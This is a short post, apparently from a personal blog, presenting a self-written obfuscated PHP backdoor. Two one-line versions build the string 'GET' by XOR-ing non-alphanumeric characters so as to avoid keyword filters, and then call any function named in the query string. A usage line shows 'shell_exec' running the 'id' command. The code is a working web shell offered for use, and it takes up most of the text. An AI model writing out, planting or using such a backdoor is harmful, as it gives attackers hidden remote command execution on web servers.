Non-alphanumeric PHP Simple Backdoor
After read and learn about non-alphanumeric code in php, i decide to write my own non-alphanumeric PHP simple backdoor.
<? $_="{"; #XOR char $_=($_^"<").($_^">;").($_^"/"); #XOR = GET ?> <?=${'_'.$_}["_"](${'_'.$_}["__"]);?>
well, it’s a quite simple script, just a XOR function over strings. By XOR-ing “<>/” with “{” we have “GET” string as the result. Put the result in one-liner code execution and done.
Another version with “<pre>” tag.
<? $_="{"; #XOR char $__=($_^"+").($_^")").($_^">"); #XOR = PRE $_=($_^"<").($_^">").($_^"/"); #XOR = GET ?> <?="<".$__.">".${'_'.$_}["_"](${'_'.$_}["__"]);?>
How to:
blabla.php?_=shell_exec&__=id